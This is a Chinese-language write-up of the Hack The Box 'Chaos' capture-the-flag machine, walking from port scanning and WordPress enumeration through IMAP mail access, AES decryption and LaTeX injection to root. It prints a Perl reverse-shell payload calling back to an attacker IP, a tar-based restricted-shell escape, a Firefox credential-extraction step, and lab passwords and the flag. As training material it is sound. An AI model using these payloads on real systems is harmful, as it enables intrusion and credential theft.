Hack The Box Chaos WriteUp

1.端口信息，通过nmap扫描，发现Chaos开放6个端口，主要有web及邮件服务。

端口信息

2.web服务目录爆破，利用Gobuster对80端口的web服务进行发现。能够在以下路径找到wordpress：
http://10.10.10.120/wp/wordpress

image.png

3.wpscan枚举用户，探测发现当前只有human一个用户在wordpress环境中：
wpscan --stealthy --url http://10.10.10.120/wp/wordpress/ --enumerate

enumerate

利用human用户名可以访问一篇加密博客，获取webmail的登录账户：
username:ayush
password:jiujitsu (这个密码决定了之后的所有步骤...)

webmail

4.登录webmail，因为邮件服务器不运行非加密的连接请求，所以必须使用openssl连接。在草稿箱内可以找到一封包含附件的邮件，附件包含一段密文、一个加密脚本及一个密钥。
连接服务：openssl s_client -connect chaos.htb:143 -starttls imap
查看邮箱：tag LIST "" "*" （包含草稿、发信、收件）
选择草稿箱：tag SELECT Drafts
选择邮件：tag FETCH 1 (BODY)
查看邮件：tag FETCH 1 BODY.PEEK[]

邮件原文

5.破译密文，邮件中包含3个关键部分。首先提到用户sahay就是密码，其次给了一段名为enim_msg.txt的密文，最后是en.py的加密脚本。经过base64解码后，脚本的逻辑如下：

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV =Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
            hasher = SHA256.new(password.encode('utf-8'))
            return hasher.digest()

不难看出getkey生成了最初的密钥，输入参数password就是邮件中提到的sahay。encrypt采用AES CBC加密算法，初始向量IV采用16位随机字符串。base64解码后的密文enim_msg.txt，文本长度为272，刚好可以整除16，272/16=17，因此可以确定CBC分组长度为16。根据AES标准，密文前16位为IV初始向量，即：
IV = 0000000000000234

响应的解密函数及明文如下：

from Crypto.Hash import SHA256
from Crypto.Cipher import AES
import Crypto.Cipher.AES
from binascii import hexlify, unhexlify

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV =Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
            hasher = SHA256.new(password.encode('utf-8'))
            return hasher.digest()

if __name__=="__main__":
    chunksize = 64*1024
    mkey = getKey("sahay")
    mIV = (b"0000000000000234")

    decipher = AES.new(mkey,AES.MODE_CBC,mIV)

    with open("demsg.txt", 'rb') as infile:
        chunk = infile.read(chunksize)
        plaintext = decipher.decrypt(chunk) 
        print plaintext

注意解密后，明文为base64编码，前16位IV应该除去，剩余字符串可正常解码：

明文

6.LaTeX攻击，根据提示，在/etc/hosts文件中添加对应的域名，访问指定路径后会看到一个pdf生成器，是典型的LaTeX攻击。网页提示只有一个模板可以被使用，尝试后发现是test3模板，输入正文并点击生成按钮后，网页并不会有直接的提示，需要启用开发者模式获得结果，生成的pdf在路径http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/pdf/。攻击的原理及介绍请参考：https://0day.work/hacking-with-latex/

pdfTeX, Version 3.14159265-2.6-1.40.19

这里直接给出反弹POC：

\immediate\write18{perl -e 'use Socket;$i="10.10.16.49";$p=6666;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}

7.获取user.txt。在获取一个www-data权限的shell后，可以利用ayush的密码jiujitsu切换至ayush的会话中，但这是一个rbash，环境变量被设置在/home/ayush/.app中，拒绝了绝大多数的命令，经过尝试dir可以正常执行，在.app目录中有tar，这可以用来逃逸rbash限制。
逃逸POC：tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
获得正常bash后，添加环境变量export PATH=$PATH:/usr/bin/，打印出user.txt。

获取user.txt

8.获取root.txt。在/home/ayush目录中发现，该用户安装有mozilla firefox。检查key4.db及cert9.db，发现文件体积均大于默认安装后的大小，怀疑可能保存有用户登录凭据。firefox_decrypt可用于提取缓存凭据，项目地址如下：
https://github.com/unode/firefox_decrypt
上传运行后，firefox_decrypt.py会要求输入解密用的主密钥，而这个密钥正是jiujitsu，提取的root密码为：jiujitsu。利用该密码su至root权限获取旗标。

root

root@chaos:~# cat root.txt
cat root.txt
4eca7e09e3520e020884563cfbabbc70

最后编辑于：2019.03.06 15:19:20

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 158,233评论 4赞 360
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 67,013评论 1赞 291
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 108,030评论 0赞 241
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 43,827评论 0赞 204
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 52,221评论 3赞 286
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 40,542评论 1赞 216
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 31,814评论 2赞 312
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 30,513评论 0赞 198
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 34,225评论 1赞 241
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 30,497评论 2赞 244
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 31,998评论 1赞 258
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 28,342评论 2赞 253
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 32,986评论 3赞 235
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 26,055评论 0赞 8
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 26,812评论 0赞 194
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 35,560评论 2赞 271
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 35,461评论 2赞 266

Hack The Box Chaos WriteUp

推荐阅读更多精彩内容